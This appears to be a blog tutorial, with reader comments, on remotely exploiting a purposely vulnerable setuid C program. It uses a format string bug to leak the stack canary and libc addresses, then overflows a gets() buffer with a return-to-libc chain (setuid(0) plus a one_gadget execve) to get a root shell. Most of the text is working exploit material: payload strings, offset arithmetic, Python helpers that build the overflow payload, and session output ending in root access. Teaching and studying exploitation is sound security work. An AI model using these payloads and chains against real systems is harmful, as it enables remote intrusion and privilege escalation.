Format String Exploits: Defeating Stack Canary, NX and ASLR Remotely on 64 bit
Hey. Welcome back. Last time we learned how to bypass the NX bit by making the stack executable again with functions like mprotect() and then executing our shellcode. This time we will look at a different type of vulnerability from our usual stack overflows. Format string vulnerabilities seem very innocent at first but can put a lot of critical information at an attacker's disposal. We will develop a remote exploit and defeat the stack canary, the NX bit and ASLR.
Let's dive into a simple example, a simple program. It first asks for the user's name and then a secret code. It could then verify the code or do something else with it, but for now we will focus only on the part above. You can clearly see a buffer overflow vulnerability: the secret code is read with the gets function. There could be a read function with improper bounds checks too. Buffering for stdin and stdout is disabled with the setvbuf function, as we will serve this program over a network. Did you notice 'printf(name);' on line 21 of the code? It looks like a lazy programmer's mistake. It passes the buffer pointed to by name directly to printf as the format string. It seems so innocent, but what will the behavior be if we provide some format specifiers in name instead? Let's check it out. First compile the code. We are using a 64 bit system and this time we will keep all default protection mechanisms and ASLR on, so no extra flags are required. On the target server, give it setuid root permissions.
virtual@mecha:~$ gcc format.c -o format
virtual@mecha:~$ sudo chown root format
virtual@mecha:~$ sudo chmod +s format
Now we will serve it on a port with this command.
virtual@mecha:~$ socat tcp-listen:5555,reuseaddr,fork, exec:"./format"
It listens on TCP port 5555 and, whenever a connection is made, executes "./format". You can check by connecting to the server with netcat or telnet on port 5555.
virtual@mecha:~$ nc 192.168.1.4 5555
What is your name?
Name: Attacker
Hello Attacker
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
Great, it's working over the network. Let's pass some format strings as the name. I have passed '%lx' 15 times, separated by '-'.
virtual@mecha:~$ nc 192.168.1.4 5555
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7ffeae3fd1b0-7f69459f8720-0-7f6945bde4c0-7f6945bde4c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffeae3ff980-9a7b045172d7ef00
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
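If you want to check what a leaked word like 2d786c252d786c25 from the output above actually holds, you can turn it back into bytes. Here is a minimal Python sketch, assuming each '-' separated field is one 8-byte stack word stored in little-endian order (as on x86-64); decode_leaked_word is just a name picked for illustration.

```python
def decode_leaked_word(hex_word: str) -> bytes:
    """Turn one %lx field back into the 8 bytes that were in memory."""
    value = int(hex_word, 16)
    # printf drops leading zeros, so rebuild the full 8-byte word and
    # emit it in little-endian (memory) order.
    return value.to_bytes(8, "little")


print(decode_leaked_word("2d786c252d786c25"))  # b'%lx-%lx-'
print(decode_leaked_word("a786c25"))           # b'%lx\n\x00\x00\x00\x00'
```

The second word is the tail of our input: the last '%lx' followed by the newline we typed.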
What are those weird hexadecimal characters? Notice that '2d786c25' keeps repeating. If you look up an ASCII table, those bytes read in little-endian order (25 6c 78 2d) spell '%lx-'. It means the format string has printed the contents of the stack, including our own input, back to us. There are some addresses leaked too. You can verify this by loading the program in gdb and dumping the stack. Here '%lx' is used to print a long in hexadecimal, as this is 64 bit, and '-' is used to separate the output. In this article we will focus on using those leaked addresses to find the libc base address and on leaking the stack canary. We will then use this leaked memory to do a successful return to libc by overflowing the buffer while entering the secret code. Let's load the program in gdb and analyze it.
virtual@mecha:~$ gdb format -q
Reading symbols from format...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : ENABLED
RELRO : Partial
gdb-peda$ aslr
ASLR is OFF
gdb-peda$ disas center
Dump of assembler code for function center:
0x0000000000000815 <+0>: push rbp
0x0000000000000816 <+1>: mov rbp,rsp
0x0000000000000819 <+4>: sub rsp,0x90
0x0000000000000820 <+11>: mov rax,QWORD PTR fs:0x28
0x0000000000000829 <+20>: mov QWORD PTR [rbp-0x8],rax
0x000000000000082d <+24>: xor eax,eax
0x000000000000082f <+26>: lea rdi,[rip+0x1b2] # 0x9e8
0x0000000000000836 <+33>: mov eax,0x0
0x000000000000083b <+38>: call 0x6e0 <printf@plt>
0x0000000000000840 <+43>: lea rax,[rbp-0x90]
0x0000000000000847 <+50>: mov rdi,rax
0x000000000000084a <+53>: mov eax,0x0
0x000000000000084f <+58>: call 0x710 <gets@plt>
0x0000000000000854 <+63>: lea rax,[rbp-0x90]
0x000000000000085b <+70>: mov rsi,rax
0x000000000000085e <+73>: lea rdi,[rip+0x1a3] # 0xa08
0x0000000000000865 <+80>: mov eax,0x0
0x000000000000086a <+85>: call 0x6e0 <printf@plt>
0x000000000000086f <+90>: nop
0x0000000000000870 <+91>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000000874 <+95>: xor rax,QWORD PTR fs:0x28
0x000000000000087d <+104>: je 0x884 <center+111>
0x000000000000087f <+106>: call 0x6d0 <__stack_chk_fail@plt>
0x0000000000000884 <+111>: leave
0x0000000000000885 <+112>: ret
End of assembler dump.
gdb-peda$ b *center +95
Breakpoint 1 at 0x874
As the checksec output shows, most memory protections, like the stack canary and the NX bit, are on. We will keep ASLR disabled in gdb for now so that we can analyze easily. We have already verified the format string vulnerability in name. Let's check the buffer overflow and the stack canary in the code. In the session above we disassembled the center function and set a breakpoint at *center+95, where the stack canary is verified before the program decides whether to call __stack_chk_fail.
Stack Canaries
Stack canaries are just random bytes placed after the buffer and checked before the function returns. If a buffer overflow occurs, the stack canary is overwritten, so the stack check fails and the program is aborted. Stack canaries usually contain a null byte (the trailing '00' in the hex values here) to make exploitation through string functions difficult. We don't have to worry about null bytes with the gets function, since it only stops at a newline. We will find the stack canary through the format string vulnerability here. You can try to bruteforce it on 32 bit systems too, but it won't really be feasible to bruteforce on 64 bit. Run the program with format strings and let's fill the code buffer completely with 128 'A's.
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-
Hello 7ffec094b550-7fbb5533a720-0-7fbb555204c0-7fbb555204c0-2d786c252d786c25-2d786c252d786c25-
2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a2d786c25-
7ffec094dd20-7068c9a76fdc1c00-
Enter secret code !
Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[----------------------------------registers-----------------------------------]
RAX: 0x7068c9a76fdc1c00
RBX: 0x0
RCX: 0x0
RDX: 0x7fbb5533a720 --> 0x0
RSI: 0x7ffec094b4b0 ("Entered Command center with code > ", 'A' , " .\n94b550-7fbb5533a720-0-7fbb555204c0"...)
RDI: 0x0
RBP: 0x7ffec094dbe0 --> 0x7ffec094dc40 --> 0x555aec917960 (<__libc_csu_init>: push r15)
RSP: 0x7ffec094db50 ('A' )
RIP: 0x555aec917874 (<center+95>: xor rax,QWORD PTR fs:0x28)
R8 : 0x7fbb555204c0 (0x00007fbb555204c0)
R9 : 0x7ffec094af60 --> 0x0
R10: 0x0
R11: 0x246
R12: 0x555aec917730 (<_start>: xor ebp,ebp)
R13: 0x7ffec094dd20 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x555aec91786a <center+85>: call 0x555aec9176e0 <printf@plt>
0x555aec91786f <center+90>: nop
0x555aec917870 <center+91>: mov rax,QWORD PTR [rbp-0x8]
=> 0x555aec917874 <center+95>: xor rax,QWORD PTR fs:0x28
0x555aec91787d <center+104>: je 0x555aec917884 <center+111>
0x555aec91787f <center+106>: call 0x555aec9176d0 <__stack_chk_fail@plt>
0x555aec917884 <center+111>: leave
0x555aec917885 <center+112>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7ffec094db50 ('A' )
0008| 0x7ffec094db58 ('A' )
0016| 0x7ffec094db60 ('A' )
0024| 0x7ffec094db68 ('A' )
0032| 0x7ffec094db70 ('A' )
0040| 0x7ffec094db78 ('A' )
0048| 0x7ffec094db80 ('A' )
0056| 0x7ffec094db88 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0000555aec917874 in center ()
The stack canary, '0x7068c9a76fdc1c00', is loaded into the rax register and then checked. If you look at the memory dumped by our format string, the last value is exactly this stack canary. Yeah, we leaked the stack canary. First problem solved. Now, to bypass the NX bit we will do a return to libc. But as ASLR will be on, we need to find the libc base address on every run. To solve this we will use the addresses leaked by the format string. You can leak such addresses to find the approximate position of your shellcode too.
gdb-peda$ vmmap
Start End Perm Name
0x00007fbb54f82000 0x00007fbb55135000 r-xp /usr/lib/libc-2.27.so
If you look carefully at the dumped addresses, you can notice some seem to be from libc. They must have been left on the stack by functions that used them earlier. They point to specific locations relative to libc, so whenever you run the program they refer to the same thing. Even when ASLR is on, only the absolute addresses change; they still point to the same place. That means they have the same offset from libc base every time. We can take one of these addresses, calculate its offset from libc base and use that offset every time to find libc base. Time to turn ASLR on and find the offset to libc base.
gdb-peda$ aslr on
gdb-peda$ aslr
ASLR is ON
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7ffe72f66210-7fc16bb5a720-0-7fc16bd404c0-7fc16bd404c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffe72f689e0-87f4107dcd08200
Enter secret code !
Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[----------------------------------registers-----------------------------------]
RAX: 0x87f4107dcd08200
RBX: 0x0
RCX: 0x0
RDX: 0x7fc16bb5a720 --> 0x0
RSI: 0x7ffe72f66170 ("Entered Command center with code > ", 'A' , " .\nf66210-7fc16bb5a720-0-7fc16bd404c0"...)
RDI: 0x0
RBP: 0x7ffe72f688a0 --> 0x7ffe72f68900 --> 0x5581705e8960 (<__libc_csu_init>: push r15)
RSP: 0x7ffe72f68810 ('A' )
RIP: 0x5581705e8874 (<center+95>: xor rax,QWORD PTR fs:0x28)
R8 : 0x7fc16bd404c0 (0x00007fc16bd404c0)
R9 : 0x7ffe72f65c20 --> 0x0
R10: 0x0
R11: 0x246
R12: 0x5581705e8730 (<_start>: xor ebp,ebp)
R13: 0x7ffe72f689e0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x5581705e886a <center+85>: call 0x5581705e86e0 <printf@plt>
0x5581705e886f <center+90>: nop
0x5581705e8870 <center+91>: mov rax,QWORD PTR [rbp-0x8]
=> 0x5581705e8874 <center+95>: xor rax,QWORD PTR fs:0x28
0x5581705e887d <center+104>: je 0x5581705e8884 <center+111>
0x5581705e887f <center+106>: call 0x5581705e86d0 <__stack_chk_fail@plt>
0x5581705e8884 <center+111>: leave
0x5581705e8885 <center+112>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7ffe72f68810 ('A' )
0008| 0x7ffe72f68818 ('A' )
0016| 0x7ffe72f68820 ('A' )
0024| 0x7ffe72f68828 ('A' )
0032| 0x7ffe72f68830 ('A' )
0040| 0x7ffe72f68838 ('A' )
0048| 0x7ffe72f68840 ('A' )
0056| 0x7ffe72f68848 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x00005581705e8874 in center ()
gdb-peda$ vmmap
Start End Perm Name
0x00007fc16b7a2000 0x00007fc16b955000 r-xp /usr/lib/libc-2.27.so
I am choosing the 4th address, which seems to be from libc, and calculating its offset from libc base.
0x7fc16bd404c0 - 0x00007fc16b7a2000 = 0x59e4c0
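The same arithmetic can be scripted so it runs on every connection. Below is a small Python sketch, assuming the response line has the shape shown in the gdb run above, that the 4th field is the libc-relative leak and the 15th field is the canary. The function and constant names are made up for illustration, and the offset 0x59e4c0 is only valid for the libc build on my system.

```python
LIBC_LEAK_INDEX = 3          # 4th field of the dump (0-based index)
CANARY_INDEX = 14            # 15th field, the last value leaked
LIBC_LEAK_OFFSET = 0x59e4c0  # leaked value minus libc base, measured in gdb


def parse_leak(hello_line: str):
    """Return (canary, libc_base) from a 'Hello a-b-c-...' response line."""
    dump = hello_line.split("Hello", 1)[1].strip()
    fields = dump.split("-")
    canary = int(fields[CANARY_INDEX], 16)
    libc_base = int(fields[LIBC_LEAK_INDEX], 16) - LIBC_LEAK_OFFSET
    # A mapping always starts on a page boundary, so the low 12 bits
    # of a correct base are zero.
    if libc_base & 0xFFF:
        raise ValueError("libc base is not page aligned; wrong index or offset?")
    return canary, libc_base


# The dump from the ASLR-on gdb run above, rebuilt field by field.
sample = "Hello " + "-".join(
    ["7ffe72f66210", "7fc16bb5a720", "0", "7fc16bd404c0", "7fc16bd404c0"]
    + ["2d786c252d786c25"] * 7
    + ["a786c25", "7ffe72f689e0", "87f4107dcd08200"]
)
canary, libc_base = parse_leak(sample)
print(hex(canary), hex(libc_base))  # 0x87f4107dcd08200 0x7fc16b7a2000
```

The result matches the canary in rax and the libc start address reported by vmmap in that run.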
Cool. This offset will always be the same for the 4th address. Now you can find the offsets to the stack canary and the return address either from a direct stack dump or with a pattern.
0x7ffe72f68870: 0x4141414141414141 0x4141414141414141
0x7ffe72f68880: 0x4141414141414141 0x4141414141414141
0x7ffe72f68890: 0x0000000000000000 0x087f4107dcd08200 <== canary
0x7ffe72f688a0: 0x00007ffe72f68900 0x00005581705e893d <== return address
virtual@mecha:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565
[*] Exact match at offset 136
It turned out to be 136 for the stack canary and 152 for the return address on my system. So the layout is
code = 'A'*136 + canary(8) + 'B'*8 + return_address(8)
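That layout can be written down as a small Python helper. This is only a sketch under the offsets measured above (136 and 152 on my system); build_overflow is a hypothetical name, and the newline check is there because gets stops reading at the first newline.

```python
import struct

CANARY_OFFSET = 136  # bytes from the start of the code buffer to the canary


def build_overflow(canary: int, return_address: int) -> bytes:
    """Lay out padding, canary, saved rbp filler and the new return address."""
    payload = b"A" * CANARY_OFFSET
    payload += struct.pack("<Q", canary)          # put the leaked canary back
    payload += b"B" * 8                           # overwrites saved rbp
    payload += struct.pack("<Q", return_address)  # lands at offset 152
    if b"\n" in payload:
        # gets() would cut the input short at this byte.
        raise ValueError("payload contains a newline byte")
    return payload


# Values taken from the stack dump above, used here only to show the layout.
payload = build_overflow(0x087F4107DCD08200, 0x00005581705E893D)
print(len(payload))  # 160
```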
Put your glasses on, it's time to write the remote exploit. Since we are serving the program over a network, I will simply use telnetlib in Python to connect and interact with it. You can use the pwntools library too, but for simplicity I'm just using telnetlib. You can read more on pwntools here. We will see more of pwntools in future. Our strategy is to first send the format strings, then read the output and extract the libc address and the stack canary, then calculate the libc base from that address and generate a return to libc payload. We will call setuid(0); first, because shells such as bash drop privileges when they are started with a real user ID that differs from the effective one, as happens under a setuid binary. Since this is 64 bit, we will pop 0x0 into the rdi register so that it is passed to setuid as its argument. For executing '/bin/sh', I'm simply using a one_gadget execve. You can use this tool to find one_gadgets, or install it simply with
$ gem install one_gadget
One thing we are assuming here is that we know the libc version of the target and are crafting the return to libc according to that. When you don't know the libc version, you may try to leak some more memory and match offsets against the dumped addresses. You may also look up online libc databases to find the target libc version. One thing you can notice is that the last 3 hex digits of the libc base address are always '000', so the last 3 digits of a leaked address are the same as the last 3 digits of its offset. This will be even easier on 32 bit as addresses are smaller. We can also leak addresses from the Global Offset Table. Cool places to search are libc.blukat.me and libcdb.com. Also I found a repository with a big database of libcs here. We will learn more on using such leaks and more ways to leak in the next articles.
virtual@mecha:~$ one_gadget /usr/lib/libc.so.6
0x43b88 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x43bdc execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xe49c0 execve("/bin/sh", rsp+0x60, environ)
constraints:
[rsp+0x60] == NULL
You can find more ROP gadgets with the ROPgadget or Ropper tools. Then find the offset of setuid.
virtual@mecha:~$ readelf -a /usr/lib/libc.so.6 | grep setuid
23: 00000000000c67a0 145 FUNC WEAK DEFAULT 12 setuid@@GLIBC_2.2.5
1604: 0000000000000000 0 FILE LOCAL DEFAULT ABS setuid.c
5134: 00000000000c67a0 145 FUNC LOCAL DEFAULT 12 __setuid
5878: 00000000000c67a0 145 FUNC WEAK DEFAULT 12 setuid
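With these offsets the return to libc chain can be sketched in Python. This is an illustration and not the exploit script itself: build_ret2libc is a hypothetical name, the setuid and one_gadget offsets are the ones printed above for my libc, and the offset of a 'pop rdi; ret' gadget is not shown in this article, so it is left as a parameter you have to fill in from ROPgadget or Ropper output for the target libc.

```python
import struct

SETUID_OFFSET = 0xC67A0      # from the readelf output above
ONE_GADGET_OFFSET = 0x43B88  # first one_gadget result above (needs rax == NULL)
CANARY_OFFSET = 136          # measured with the pattern earlier


def build_ret2libc(libc_base: int, canary: int, pop_rdi_offset: int) -> bytes:
    """Overflow payload: setuid(0), then jump to the one_gadget."""
    def q(value: int) -> bytes:
        return struct.pack("<Q", value)

    chain = q(libc_base + pop_rdi_offset)      # pop rdi ; ret (assumed gadget)
    chain += q(0)                              # rdi = 0, the argument for setuid
    chain += q(libc_base + SETUID_OFFSET)      # setuid(0)
    chain += q(libc_base + ONE_GADGET_OFFSET)  # execve("/bin/sh", ...)

    payload = b"A" * CANARY_OFFSET + q(canary) + b"B" * 8 + chain
    if b"\n" in payload:
        # gets() stops at a newline, so such a payload would be truncated.
        raise ValueError("payload contains a newline byte")
    return payload
```

One reason the first one_gadget is a reasonable pick here: setuid(0) returns 0 in rax on success, which should satisfy the 'rax == NULL' constraint. If it does not work on your target, try the other gadgets.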
Putting everything together, here's my simple exploit code. I have commented each line with an explanation. Here's how the stack layout will be after the exploit. Run it.
virtual@mecha:~$ python2 format.py
Enter this command to setup a server. 5555 is port !
$ socat tcp-listen:5555,fork, exec:'./format'
[i] Enter target ip (localhost): 192.168.43.204
[i] Enter target port (5555): 5555
[i] Connecting to server
What is your name?
Name:
[' Hello 7ffdec247930', '7fb462c49720', '0', '7fb462e2f4c0', '7fb462e2f4c0', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c25', '7ffdec24a100', '3fe25b5b8083e400', 'Enter secret code !\nCode:']
[+] Found Stack Canary : 0x3fe25b5b8083e400
[+] Calculated Libc base : 0x7fb462891000
[i] Payload generated
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[+] Shell ready. Enter commands !
uid=0(root) gid=1000(virtual) groups=1000(virtual),10(wheel)
whoami
root
pwd
/home/virtual/
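The first half of the session above (wait for the prompt, send the format string, read back the leak) can also be driven with plain sockets, which is handy because telnetlib was removed from the standard library in Python 3.13. A minimal sketch, assuming the prompts contain 'Name:' and 'Code:' as in the output shown; the Tube class and leak_stack function are names invented for this example.

```python
import socket


class Tube:
    """Tiny buffered wrapper so nothing read past a marker is lost."""

    def __init__(self, sock: socket.socket):
        self.sock = sock
        self.buf = b""

    def recv_until(self, marker: bytes) -> bytes:
        while marker not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("connection closed before marker arrived")
            self.buf += chunk
        end = self.buf.index(marker) + len(marker)
        out, self.buf = self.buf[:end], self.buf[end:]
        return out

    def send_line(self, data: bytes) -> None:
        self.sock.sendall(data + b"\n")


def leak_stack(tube: Tube, count: int = 15) -> bytes:
    """Send count '%lx' specifiers as the name and return the reply."""
    tube.recv_until(b"Name:")
    tube.send_line(b"-".join([b"%lx"] * count))
    return tube.recv_until(b"Code:")
```

Against the real service you would wrap socket.create_connection((host, port)) in a Tube, call leak_stack, build the payload from the parsed values and send it with send_line on the same connection.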
Awesome. We wrote a remote exploit and, as the service was running as root, we got root privileges.
Well, that's all for now. In the next articles we will learn more about the GOT and PLT, how powerful format string exploits can be, and more exploitation techniques. Keep practicing.
For any queries contact : @ShivamShrirao
Next Read: Return to PLT, GOT to bypass ASLR remotely
Can you please help me out with the following situation?
When I executed format.py I could get the stack canary, the calculated libc base and the payload value, and could reach this line in my output: [+] Shell ready. Enter commands ! But I could not get the remote connection to the machine.
When I executed my format.py file and it reaches this line, [+] Shell ready. Enter commands !, it displays that the connection was closed by the server.
Not sure what I missed. I did find one_gadget, pop_rdi and setuid values for my system.
Also, I could not understand why we are using metasploit and what pattern_offset.rb is doing in the command mentioned below.
"/opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565"
In the above command I am not sure how are you generating this value -"0x3765413665413565".
Your timely response would be highly appreciated.
Looking forward for your response.
Thanks,
Varsha
Regarding metasploit, I am using that to create a long pattern. So when the buffer overflow occurs and registers/memory are overwritten, I can see what part of the pattern they are overwritten by and calculate the offset easily instead of trying different lengths. You can read more about it here https://www.ret2rop.com/2018/08/stack-based-buffer-overflow-x64.html
Regarding the exploit failing, I think most likely your one_gadget isn't working. Sometimes it happens when registers don't have the correct values. Try a few other one_gadgets, or you can make an execve('/bin/sh') or system('sh') chain. I have explained that in some of my other articles. Also, to be sure, do try attaching gdb to the target program and checking the exploit execution step by step.
When I use the exact same code I don't get the library addresses leaked. Did something change in terms of security on Ubuntu, or am I doing something wrong?
My Result:
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7fff52dd39d0-0-0-6-6-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c252d786c25-7fff52dd61b0-8e04e06c68602600-0
�a�R�Enter secret code !
Code: gfdfdfdf
Entered Command center with code > gfdfdfdf .
In your results I can see the addresses are leaked. These are some random left over addresses and memory on the stack. So they may or may not contain libc address at the exact place as they mostly don't have any particular order.
There are some starting with "7fff" in your dump, they may be from libc, you have to check if they are in range by comparing with range of libc addresses from "vmmap" command.
If not you may have to try longer sequences to dump more memory and also try indexing the format strings as I have discussed in next articles till you find some useful addresses. Btw I recommend using "%p" instead of "%lx", so your payloads will be shorter.
What part of exploit exactly are you facing the problem ? Also while debugging it is better to first turn off the ASLR so that addresses don't change and then you can turn it on once you can do it with aslr off.
If you disable ASLR, the addresses will remain the same so you don't have to calculate again and again. You can also debug while using the exploit script by `at`taching to the server process with gdb.
First run the server and connect to it. Don't send any data. Start gdb as root and find the pid of the server process. Then enter `at pid` in gdb, replace pid with pid of process. Then you can debug the running process. Setup breakpoints and enter `c`ontinue.
If you are attaching to the process you can just send input through your python script, like the final exploit script I am using in the article.
You can send input through your already established netcat connection.
Type or pipe into that netcat connection.
Or
Connect with telnet/sockets in python like my exploit script and send input through that connection.
Run the script. Connect script to server. A buf process is spawned asking for input. Do not send input from script. Attach to that process in gdb. Set breakpoints, continue. Then continue the script and send the input.
Btw with some bash tricks pipes can also dynamically send input but I would suggest just stick to the script.
If you know python you know you can edit the script to do whatever you want it to do ?
Excellent article! Question - Does having ASLR on affect leaked information via format string? When ASLR is on, I get less output from e.g. %p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p... than I do when ASLR is off. When ASLR Is on, it shows `(nil)` for many addresses. Is there some other anti-format string protection?